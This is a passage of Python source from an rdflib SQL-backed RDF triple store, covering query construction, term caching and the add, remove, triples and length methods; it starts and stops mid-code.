create_sha_digest(value):\n return sha1(value.encode(\"utf-8\") if isinstance(value, str) else value).hexdigest()\n\n\n# Helper function for executing EXPLAIN on all dispatched SQL statements - for the pupose of analyzing\n# index usage addr opcode p1 p2 p3 p4 p5 comment\n# def query_analysis(query, store, cursor):\n# cursor.execute(store._normalize_sql_command(\"explain \" + query))\n# rt = cursor.fetchall()[0]\n# (\n# table,\n# jointype,\n# poskeys,\n# _key,\n# key_len,\n# comparedcol,\n# rowsexamined,\n# extra,\n# ) = rt\n# assert rt == \"\"\n# if not _key:\n# assert jointype == \"ALL\"\n# if not hasattr(store, \"queryOptMarks\"):\n# store.queryOptMarks = {}\n# hits = store.queryOptMarks.get((\"FULL SCAN\", table), 0)\n# store.queryOptMarks[(\"FULL SCAN\", table)] = hits + 1\n\n# if not hasattr(store, \"queryOptMarks\"):\n# store.queryOptMarks = {}\n# hits = store.queryOptMarks.get((_key, table), 0)\n# store.queryOptMarks[(_key, table)] = hits + 1\n\n\n# Terms: u - uri refs v - variables b - bnodes l - literal f - formula\n\n# Helper function for building union all select statement\n# Takes a list of:\n# - table name\n# - table alias\n# - table type (literal, type, asserted, quoted)\n# - where clause string\ndef union_select(selectcomponents, distinct=False, selecttype=TRIPLE_SELECT):\n selects = []\n\n for (\n table_name,\n tablealias,\n whereclause,\n tabletype,\n ) in selectcomponents:\n\n if selecttype == COUNT_SELECT:\n select_string = \"select count(*)\"\n tablesource = f\" from {table_name} \"\n\n elif selecttype == CONTEXT_SELECT:\n select_string = f\"select {tablealias}.context\"\n tablesource = f\" from {table_name} as {tablealias} \"\n\n elif tabletype in FULL_TRIPLE_PARTITIONS:\n select_string = \"select *\" # %(tablealias)\n tablesource = f\" from {table_name} as {tablealias} \"\n\n elif tabletype == ASSERTED_TYPE_PARTITION:\n\n select_string = (\n f\"SELECT {tablealias}.member AS subject, \"\n f'\"{RDF.type}\" AS predicate, '\n f\"{tablealias}.klass AS object, \"\n f\"{tablealias}.context AS context, \"\n f\"{tablealias}.termComb AS termComb, \"\n \"NULL AS objLanguage, \"\n \"NULL AS objDatatype\"\n )\n\n tablesource = f\" from {table_name} as {tablealias} \"\n\n elif tabletype == ASSERTED_NON_TYPE_PARTITION:\n select_string = \"\"\"SELECT *, NULL as objLanguage, NULL as objDatatype\"\"\"\n tablesource = f\" from {table_name} as {tablealias} \"\n\n whereclause = \"\" if whereclause is None else whereclause\n\n if isinstance(whereclause, tuple):\n\n whereclause = whereclause[0].replace(\"%s\", '\"{}\"').format(*whereclause[1])\n\n selects.append(select_string + tablesource + whereclause)\n\n orderstatement = \"\"\n\n if selecttype == TRIPLE_SELECT:\n orderstatement = \" ORDER BY subject, predicate, object\"\n\n if distinct:\n return \" UNION \".join(selects) + orderstatement\n else:\n return \" UNION ALL \".join(selects) + orderstatement\n\n\n# Takes a tuple which represents an entry in a result set and\n# converts it to a tuple of terms using the termComb integer\n# to interpret how to instanciate each term\ndef extract_triple(tuplert, store, hardcoded_context=None):\n (\n subject,\n predicate,\n obj,\n rt_context,\n term_comb,\n object_language,\n object_datatype,\n ) = tuplert\n context = rt_context is not None and rt_context or hardcoded_context.identifier\n subjterm, predterm, objterm, ctxterm = REVERSE_TERM_COMBINATIONS[term_comb]\n\n object_language = (\n None\n if object_language is not None and \"NULL\" in object_language\n else object_language\n )\n 
object_datatype = (\n None\n if object_datatype is not None and \"NULL\" in object_datatype\n else object_datatype\n )\n\n s = create_term(subject, subjterm, store)\n p = create_term(predicate, predterm, store)\n o = create_term(obj, objterm, store, object_language, object_datatype)\n\n graph_class, id_cllass = construct_graph(ctxterm)\n return s, p, o, (graph_class, id_cllass, context)\n\n\n# TODO: Stuff\n# Takes a term value, term type, and store intance and creates a term object.\n# QuotedGraphs are instantiated differently\n\n\ndef create_term(\n term_string, term_type, store, object_language=None, object_datatype=None\n):\n if term_type == \"L\":\n cache = store.literalCache.get((term_string, object_language, object_datatype))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = Literal(term_string, object_language, object_datatype)\n store.literalCache[((term_string, object_language, object_datatype))] = rt\n return rt\n elif term_type == \"F\":\n cache = store.otherCache.get((term_type, term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = QuotedGraph(store, URIRef(term_string))\n store.otherCache[(term_type, term_string)] = rt\n return rt\n elif term_type == \"B\":\n cache = store.bnodeCache.get((term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = TERM_INSTANTIATION_DICT[term_type](term_string)\n store.bnodeCache[(term_string)] = rt\n return rt\n elif term_type == \"U\":\n cache = store.uriCache.get((term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = URIRef(term_string)\n store.uriCache[(term_string)] = rt\n return rt\n else:\n cache = store.otherCache.get((term_type, term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = TERM_INSTANTIATION_DICT[term_type](term_string)\n store.otherCache[(term_type, term_string)] = rt\n return rt\n\n\nclass SQLGenerator:\n def execute_sql(self, cursor, querystr, params=None, param_list=False):\n \"\"\"\n This takes the query string and parameters and (depending on the SQL\n implementation) either fill in the parameter in-place or pass it on\n to the Python DB impl (if it supports this). The default (here) is to\n fill the parameters in-place surrounding each param with quote\n characters\n \"\"\"\n querystr = querystr.decode() if isinstance(querystr, bytes) else querystr\n\n if not params:\n cursor.execute(str(querystr))\n elif param_list:\n # raise Exception(f\"Not supported! 
{querystr} {params}\")\n for p in params:\n cursor.execute(querystr, p)\n else:\n querystr = (\n querystr.decode(\"utf-8\") if isinstance(querystr, bytes) else querystr\n )\n if \"VALUES (?\" in querystr:\n cursor.execute(querystr, params)\n else:\n params = tuple(\n [\n not isinstance(item, int) and '\"%s\"' % item or item\n for item in params\n ]\n )\n executionstr = querystr % params\n cursor.execute(executionstr)\n\n def escape_quotes(self, node_string):\n \"\"\"Properly escape strings for n-triples and n-quads serialization.\"\"\"\n if node_string is None:\n return \"\"\n output_string = \"\"\n for char in node_string:\n if char == \"\\u0009\":\n output_string += \"\\\\t\"\n elif char == \"\\u000A\":\n output_string += \"\\\\n\"\n elif char == \"\\u000D\":\n output_string += \"\\\\r\"\n elif char == \"\\u0022\":\n output_string += '\\\\\"'\n elif char == \"\\u005C\":\n output_string += \"\\\\\\\\\"\n elif (\n char >= \"\\u0020\"\n and char <= \"\\u0021\"\n or char >= \"\\u0023\"\n and char <= \"\\u005B\"\n or char >= \"\\u005D\"\n and char <= \"\\u007E\"\n ):\n output_string += char\n elif char >= \"\\u007F\" and char <= \"\\uFFFF\":\n output_string += \"\\\\u%04X\" % ord(char)\n elif char >= \"\\U00010000\" and char <= \"\\U0010FFFF\":\n output_string += \"\\\\U%08X\" % ord(char)\n return output_string\n\n # Normalize a SQL command before executing it. Commence unicode black\n # magic\n def _normalize_sql_command(self, cmd):\n\n if not isinstance(cmd, str):\n cmd = str(cmd, \"ascii\")\n return cmd\n\n # Takes a term and 'normalizes' it. Literals are escaped, Graphs are\n # replaced with just their identifiers\n def normalize_term(self, term):\n if isinstance(term, Graph):\n return term.identifier\n # TODO: FIXME: Should Literals be escaped here?\n\n # elif isinstance(term, Literal):\n # return self.escape_quotes(term)\n\n elif term is None or isinstance(term, (list, REGEXTerm)):\n return term\n else:\n return term\n\n # Builds an insert command for a type table\n def build_insert_type_statement_sql_command(self, member, klass, context, store_id):\n # columns: member, klass, context\n rt = f\"INSERT INTO {store_id}_type_statements VALUES (?, ?, ?, ?)\"\n return rt, [\n self.normalize_term(member),\n self.normalize_term(klass),\n self.normalize_term(context),\n int(type_to_termcombination(member, klass, context)),\n ]\n\n # Builds an insert command for literal triples (statements where the object is a Literal)\n def build_insert_literal_triple_sql_command(\n self, subject, predicate, obj, context, store_id\n ):\n\n triple_pattern = int(\n statement_to_termcombination(subject, predicate, obj, context)\n )\n command = (\n f\"INSERT INTO {store_id}_literal_statements VALUES (?, ?, ?, ?, ?, ?, ?)\"\n )\n return command, [\n self.normalize_term(subject),\n self.normalize_term(predicate),\n self.normalize_term(obj),\n self.normalize_term(\n context.identifier if isinstance(context, Graph) else context\n ),\n triple_pattern,\n isinstance(obj, Literal) and obj.language or \"NULL\",\n isinstance(obj, Literal) and obj.datatype or \"NULL\",\n ]\n\n # Builds an insert command for regular triple table\n def build_insert_triple_sql_command(\n self, subject, predicate, obj, context, store_id, quoted\n ):\n stmt_table = (\n f\"{store_id}_quoted_statements\"\n if quoted\n else f\"{store_id}_asserted_statements\"\n )\n\n triple_pattern = statement_to_termcombination(subject, predicate, obj, context)\n\n if quoted:\n command = f\"INSERT INTO {stmt_table} VALUES (?, ?, ?, ?, ?, ?, ?)\"\n params = [\n 
self.normalize_term(subject),\n self.normalize_term(predicate),\n self.normalize_term(obj),\n self.normalize_term(context),\n triple_pattern,\n isinstance(obj, Literal) and obj.language or \"NULL\",\n isinstance(obj, Literal) and obj.datatype or \"NULL\",\n ]\n else:\n command = f\"INSERT INTO {stmt_table} VALUES (?, ?, ?, ?, ?)\"\n params = [\n self.normalize_term(subject),\n self.normalize_term(predicate),\n self.normalize_term(obj),\n self.normalize_term(context),\n triple_pattern,\n ]\n return command, params\n\n # Builds WHERE clauses for the supplied terms and, context\n def build_where_clause(\n self,\n table_name,\n subject,\n predicate,\n obj,\n context=None,\n typetable=False,\n ):\n parameters = []\n\n if typetable:\n rdf_type_member_clause = None\n rdf_type_context_clause = None\n rdf_type_klass_clause = None\n\n clause_parts = self.build_type_member_clause(\n self.normalize_term(subject), table_name\n )\n if clause_parts is not None:\n rdf_type_member_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_type_class_clause(\n self.normalize_term(obj), table_name\n )\n if clause_parts is not None:\n rdf_type_klass_clause = clause_parts[0]\n parameters.extend(clause_parts[-1])\n\n clause_parts = self.build_context_clause(context, table_name)\n if clause_parts is not None:\n rdf_type_context_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n type_clauses = [\n rdf_type_member_clause,\n rdf_type_klass_clause,\n rdf_type_context_clause,\n ]\n clause_string = \" and \".join([clause for clause in type_clauses if clause])\n clause_string = clause_string and \"where \" + clause_string or \"\"\n else:\n subject_clause = (\n predicate_clause\n ) = (\n object_clause\n ) = (\n context_clause\n ) = literal_datatype_clause = literal_language_clause = None\n\n clause_parts = self.build_subject_clause(\n self.normalize_term(subject), table_name\n )\n if clause_parts is not None:\n subject_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_predicate_clause(\n self.normalize_term(predicate), table_name\n )\n if clause_parts is not None:\n predicate_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_object_clause(\n self.normalize_term(obj), table_name\n )\n if clause_parts is not None:\n object_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_context_clause(context, table_name)\n if clause_parts is not None:\n context_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_literal_datatype_clause(obj, table_name)\n if clause_parts is not None:\n literal_datatype_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_literal_language_clause(obj, table_name)\n if clause_parts is not None:\n literal_language_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clauses = [\n subject_clause,\n predicate_clause,\n object_clause,\n context_clause,\n literal_datatype_clause,\n literal_language_clause,\n ]\n\n clause_string = \" and \".join([clause for clause in clauses if clause])\n clause_string = clause_string and \"where \" + clause_string or \"\"\n\n return clause_string, [p for p in parameters if 
p]\n\n def build_literal_datatype_clause(self, obj, table_name):\n if isinstance(obj, Literal):\n return (\n obj.datatype is not None\n and (f\"{table_name}.objDatatype=%s\", {obj.datatype})\n or None\n )\n else:\n return None\n\n def build_literal_language_clause(self, obj, table_name):\n if isinstance(obj, Literal):\n return (\n obj.language is not None\n # and (f\"{table_name}.objLanguage={obj.language.encode('utf-8')}\",)\n and (f\"{table_name}.objLanguage=%s\", {obj.language})\n or None\n )\n else:\n return None\n\n # Stubs for Clause Functions that are overridden by specific implementations (MySQL vs SQLite for instance)\n def build_subject_clause(self, subject, tablename):\n pass # pragma: no cover\n\n def build_predicate_clause(self, predicate, tablename):\n pass # pragma: no cover\n\n def build_object_clause(self, obj, tablename):\n pass # pragma: no cover\n\n def build_context_clause(self, context, tablename):\n pass # pragma: no cover\n\n def build_type_member_clause(self, subject, tablename):\n pass # pragma: no cover\n\n def build_type_class_clause(self, obj, tablename):\n pass # pragma: no cover\n\n\nclass AbstractSQLStore(SQLGenerator, Store):\n \"\"\"\n SQL-92 formula-aware implementation of an rdflib Store.\n It stores its triples in the following partitions:\n\n - Asserted non-rdf:type statements\n - Asserted literal statements\n - Asserted rdf:type statements (in a table which models Class membership)\n The motivation for this partition is primarily query speed and\n scalability as most graphs will always have more rdf:type statements\n than others\n - All Quoted statements\n\n In addition it persists namespace mappings in a seperate table\n \"\"\"\n\n context_aware = True\n graph_aware = True\n formula_aware = True\n transaction_aware = True\n regex_matching = PYTHON_REGEX\n autocommit_default = True\n\n # Stubs for overidden\n\n def __init__(self, identifier=None, configuration=None):\n \"\"\"\n identifier: URIRef of the Store. Defaults to CWD\n configuration: string containing infomation open can use to\n connect to datastore.\n \"\"\"\n self.identifier = identifier and identifier or BNode(\"hardcoded\")\n # Use only the first 10 bytes of the digest\n self._interned_id = INTERNED_PREFIX + create_sha_digest(self.identifier)[:10]\n\n # This parameter controls how exlusively the literal table is searched\n # If true, the Literal partition is searched *exclusively* if the object term\n # in a triple pattern is a Literal or a REGEXTerm. 
Note, the latter case\n # prevents the matching of URIRef nodes as the objects of a triple in the store.\n # If the object term is a wildcard (None)\n # Then the Literal paritition is searched in addition to the others\n # If this parameter is false, the literal partition is searched regardless of what the object\n # of the triple pattern is\n self.STRONGLY_TYPED_TERMS = False\n\n if configuration is not None:\n try:\n self.open(configuration)\n except Exception as e: # pragma: no cover\n raise Exception(f\"{e} unable to open {configuration}\")\n\n self.cache_hits = 0\n self.cache_misses = 0\n\n self.literalCache = {}\n self.uriCache = {}\n self.bnodeCache = {}\n self.otherCache = {}\n self._db = None\n self.dispatcher = Dispatcher()\n\n def close(self, commit_pending_transaction=False):\n if commit_pending_transaction:\n self._db.commit()\n self._db.close()\n\n # Triple Methods\n def add(self, triple, context=None, quoted=False):\n \"\"\"Add a triple to the store of triples.\"\"\"\n (subject, predicate, obj) = triple\n context = DATASET_DEFAULT_GRAPH_ID if context is None else context\n # Pending Dataset re-work\n # assert not isinstance(context, Graph)\n if isinstance(context, Graph):\n context = context.identifier\n c = self._db.cursor()\n if quoted or predicate != RDF.type:\n # quoted statement or non rdf:type predicate\n # check if object is a literal\n if isinstance(obj, Literal):\n add_cmd, params = self.build_insert_literal_triple_sql_command(\n subject, predicate, obj, context, self._interned_id\n )\n else:\n add_cmd, params = self.build_insert_triple_sql_command(\n subject, predicate, obj, context, self._interned_id, quoted\n )\n elif predicate == RDF.type:\n # asserted rdf:type statement\n add_cmd, params = self.build_insert_type_statement_sql_command(\n subject, obj, context, self._interned_id\n )\n try:\n self.execute_sql(c, add_cmd, params)\n except Exception as e:\n if \"UNIQUE constraint failed\" in str(e):\n logger.info(f\"UNIQUE constraint failed for {[p for p in params[:-1]]}\")\n pass\n else:\n raise Exception(e) # pragma: no cover\n\n c.close()\n\n # Trigger the Store's TripleAdded event\n Store.add(self, triple, context, quoted)\n\n def addN(self, quads): # noqa: N802\n c = self._db.cursor()\n literal_triples = []\n type_triples = []\n other_triples = []\n literal_triple_insert_command = None\n type_triple_insert_command = None\n other_triple_insert_command = None\n for subject, predicate, obj, context in quads:\n if isinstance(context, QuotedGraph) or predicate != RDF.type:\n # quoted statement or non rdf:type predicate\n # check if object is a literal\n\n if isinstance(obj, Literal):\n cmd, params = self.build_insert_literal_triple_sql_command(\n subject, predicate, obj, context, self._interned_id\n )\n literal_triple_insert_command = (\n literal_triple_insert_command is not None\n and literal_triple_insert_command\n or cmd\n )\n literal_triples.append(params)\n\n else:\n cmd, params = self.build_insert_triple_sql_command(\n subject,\n predicate,\n obj,\n context,\n self._interned_id,\n isinstance(context, QuotedGraph),\n )\n other_triple_insert_command = (\n other_triple_insert_command is not None\n and other_triple_insert_command\n or cmd\n )\n other_triples.append(params)\n\n elif predicate == RDF.type:\n\n # asserted rdf:type statement\n cmd, params = self.build_insert_type_statement_sql_command(\n subject, obj, context, self._interned_id\n )\n type_triple_insert_command = (\n type_triple_insert_command is not None\n and type_triple_insert_command\n or cmd\n )\n 
type_triples.append(params)\n\n if literal_triples:\n self.execute_sql(\n c, literal_triple_insert_command, literal_triples, param_list=True\n )\n if type_triples:\n self.execute_sql(\n c, type_triple_insert_command, type_triples, param_list=True\n )\n if other_triples:\n self.execute_sql(\n c, other_triple_insert_command, other_triples, param_list=True\n )\n\n c.close()\n\n def remove(self, triple, context):\n \"\"\"Remove a triple from the store\"\"\"\n (subject, predicate, obj) = triple\n if context is not None:\n if subject is None and predicate is None and obj is None:\n self._remove_context(context)\n return\n\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n if not predicate or predicate != RDF.type:\n # Need to remove predicates other than rdf:type\n if not self.STRONGLY_TYPED_TERMS or isinstance(obj, Literal):\n\n # remove literal triple\n clause_string, params = self.build_where_clause(\n literal_table, subject, predicate, obj, context\n )\n\n cmd = f\"DELETE FROM {' '.join([literal_table, clause_string]) if clause_string else literal_table}\"\n\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n\n for table in [quoted_table, asserted_table]:\n # If asserted non rdf:type table and obj is Literal, don't do anything (already taken care of)\n if table == asserted_table and isinstance(obj, Literal):\n continue # pragma: no cover\n else:\n clause_string, params = self.build_where_clause(\n table, subject, predicate, obj, context\n )\n cmd = f\"DELETE FROM {' '.join([table, clause_string]) if clause_string else table}\"\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n\n if predicate == RDF.type or not predicate:\n # Need to check rdf:type and quoted partitions (in addition perhaps)\n clause_string, params = self.build_where_clause(\n asserted_type_table, subject, RDF.type, obj, context, True\n )\n\n cmd = f\"DELETE FROM {' '.join([asserted_type_table, clause_string]) if clause_string else asserted_type_table}\"\n\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n\n clause_string, params = self.build_where_clause(\n quoted_table, subject, predicate, obj, context\n )\n\n cmd = f\"DELETE FROM {' '.join([quoted_table, clause_string]) if clause_string else quoted_table}\"\n\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n c.close()\n # Trigger the Store's TripleRemoved event\n Store.remove(self, triple, context)\n\n def triples(self, triple, context=None):\n \"\"\"\n A generator over all the triples matching pattern. Pattern can\n be any objects for comparing against nodes in the store, for\n example, RegExLiteral, Date? 
DateRange?\n\n quoted table: _quoted_statements\n asserted rdf:type table: _type_statements\n asserted non rdf:type table: _asserted_statements\n\n triple columns:\n subject, predicate, object, context, termComb, objLanguage, objDatatype\n\n class membership columns:\n member,klass,context termComb\n\n FIXME: These union all selects *may* be further optimized by joins\n\n \"\"\"\n (subject, predicate, obj) = triple\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n c = self._db.cursor()\n\n parameters = []\n\n if predicate == RDF.type:\n # select from asserted rdf:type partition and quoted table (if a\n # context is specified)\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, context, True\n )\n parameters.extend(params)\n selects = [\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n ),\n ]\n\n elif (\n isinstance(predicate, REGEXTerm)\n and predicate.compiledExpr.match(RDF.type)\n or not predicate\n ):\n # Select from quoted partition (if context is specified), literal\n # partition if (obj is Literal or None) and asserted non rdf:type\n # partition (if obj is URIRef or None)\n selects = []\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, context, True\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n )\n )\n\n elif predicate:\n # select from asserted non rdf:type partition (optionally),\n # quoted partition (if context is speciied), and literal\n # partition (optionally)\n selects = []\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n if context is not None:\n clause_string, params = self.build_where_clause(\n \"quoted\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append((quoted_table, \"quoted\", clause_string, 
QUOTED_PARTITION))\n\n q = self._normalize_sql_command(union_select(selects))\n self.execute_sql(c, q, parameters)\n rt = c.fetchone()\n while rt:\n s, p, o, (graph_class, id_cllass, graphid) = extract_triple(\n rt, self, context\n )\n current_context = graph_class(self, id_cllass(graphid))\n contexts = [current_context]\n rt = next = c.fetchone()\n same_triple = next and extract_triple(next, self, context)[:3] == (\n s,\n p,\n o,\n )\n while same_triple:\n (\n s2,\n p2,\n o2,\n (graph_class, id_cllass, graphid),\n ) = extract_triple(next, self, context)\n c2 = graph_class(self, id_cllass(graphid))\n contexts.append(c2)\n rt = next = c.fetchone()\n same_triple = next and extract_triple(next, self, context)[:3] == (\n s,\n p,\n o,\n )\n\n yield (s, p, o), (c for c in contexts)\n\n def triples_choices(self, triple, context=None):\n \"\"\"\n A variant of triples that can take a list of terms instead of a single\n term in any slot. Stores can implement this to optimize the response time\n from the import default 'fallback' implementation, which will iterate\n over each term in the list and dispatch to tripless\n \"\"\"\n (subject, predicate, object_) = triple\n if isinstance(object_, list):\n assert not isinstance(subject, list), \"object_ / subject are both lists\"\n assert not isinstance(predicate, list), \"object_ / predicate are both lists\"\n if not object_:\n object_ = None\n for (s1, p1, o1), cg in self.triples(\n (subject, predicate, object_), context\n ):\n yield (s1, p1, o1), cg\n\n elif isinstance(subject, list):\n assert not isinstance(predicate, list), \"subject / predicate are both lists\"\n if not subject:\n subject = None\n for (s1, p1, o1), cg in self.triples(\n (subject, predicate, object_), context\n ):\n yield (s1, p1, o1), cg\n\n elif isinstance(predicate, list):\n assert not isinstance(subject, list), \"predicate / subject are both lists\"\n if not predicate:\n predicate = None\n for (s1, p1, o1), cg in self.triples(\n (subject, predicate, object_), context\n ):\n yield (s1, p1, o1), cg\n\n def __repr__(self):\n try:\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n selects = [\n (asserted_type_table, \"typed\", \"\", ASSERTED_TYPE_PARTITION),\n (quoted_table, \"quoted\", \"\", QUOTED_PARTITION),\n (asserted_table, \"asserted\", \"\", ASSERTED_NON_TYPE_PARTITION),\n (literal_table, \"literal\", \"\", ASSERTED_LITERAL_PARTITION),\n ]\n q = union_select(selects, distinct=False, selecttype=COUNT_SELECT)\n self.execute_sql(c, self._normalize_sql_command(q))\n rt = c.fetchall()\n type_len, quoted_len, asserted_len, literal_len = [\n returned_tuple[0] for returned_tuple in rt\n ]\n return (\n \"\"\n )\n except Exception: # pragma: no cover\n return \"\"\n\n def __len__(self, context=None, count=False):\n \"\"\"Number of statements in the store.\"\"\"\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n parameters = []\n quoted_context = asserted_context = type_context = literal_context = None\n\n clause_parts = self.build_context_clause(context, quoted_table)\n if clause_parts:\n quoted_context, params = clause_parts\n 
parameters.extend([p for p in params if p])\n\n clause_parts = self.build_context_clause(context, asserted_table)\n if clause_parts:\n asserted_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n clause_parts = self.build_context_clause(context, asserted_type_table)\n if clause_parts:\n type_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n clause_parts = self.build_context_clause(context, literal_table)\n if clause_parts:\n literal_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n distincts = False\n selects = [\n (\n asserted_type_table,\n \"typed\",\n type_context and \"where \" + type_context or \"\",\n ASSERTED_TYPE_PARTITION,\n ),\n (\n asserted_table,\n \"asserted\",\n asserted_context and \"where \" + asserted_context or \"\",\n ASSERTED_NON_TYPE_PARTITION,\n ),\n (\n literal_table,\n \"literal\",\n literal_context and \"where \" + literal_context or \"\",\n ASSERTED_LITERAL_PARTITION,\n ),\n ]\n\n if context is not None:\n selects += [\n (\n quoted_table,\n \"quoted\",\n quoted_context and \"where \" + quoted_context or \"\",\n QUOTED_PARTITION,\n ),\n ]\n\n distincts = True # noqa: F841\n\n q = union_select(\n selects,\n # TODO: FIXME: sqlite3 fails to handle a straight UNION\n # properly, omitting the result from type assertions\n # works with UNION ALL\n distinct=False, # distincts,\n selecttype=COUNT_SELECT,\n )\n\n self.execute_sql(c, self._normalize_sql_command(q), parameters)\n rt = c.fetchall()\n c.close()\n\n return reduce(lambda x, y: x + y, [returned_tuple[0] for returned_tuple in rt])\n\n def contexts(self, triple=None):\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n parameters = []\n\n if triple is not None:\n if len(triple) == 4:\n (subject, predicate, obj, ctx) = triple\n elif len(triple) == 3:\n (subject, predicate, obj) = triple\n else:\n raise Exception(f\"Funny values for triple {triple}\")\n\n if predicate == RDF.type:\n # select from asserted rdf:type partition and quoted table\n # (if a context is specified)\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, None, True\n )\n parameters.extend(params)\n selects = [\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n ),\n ]\n\n elif (\n isinstance(predicate, REGEXTerm)\n and predicate.compiledExpr.match(RDF.type)\n or not predicate\n ):\n # Select from quoted partition (if context is specified),\n # literal partition if (obj is Literal or None) and asserted\n # non rdf:type partition (if obj is URIRef or None)\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, None, True\n )\n parameters.extend(params)\n selects = [\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n ),\n ]\n\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and 
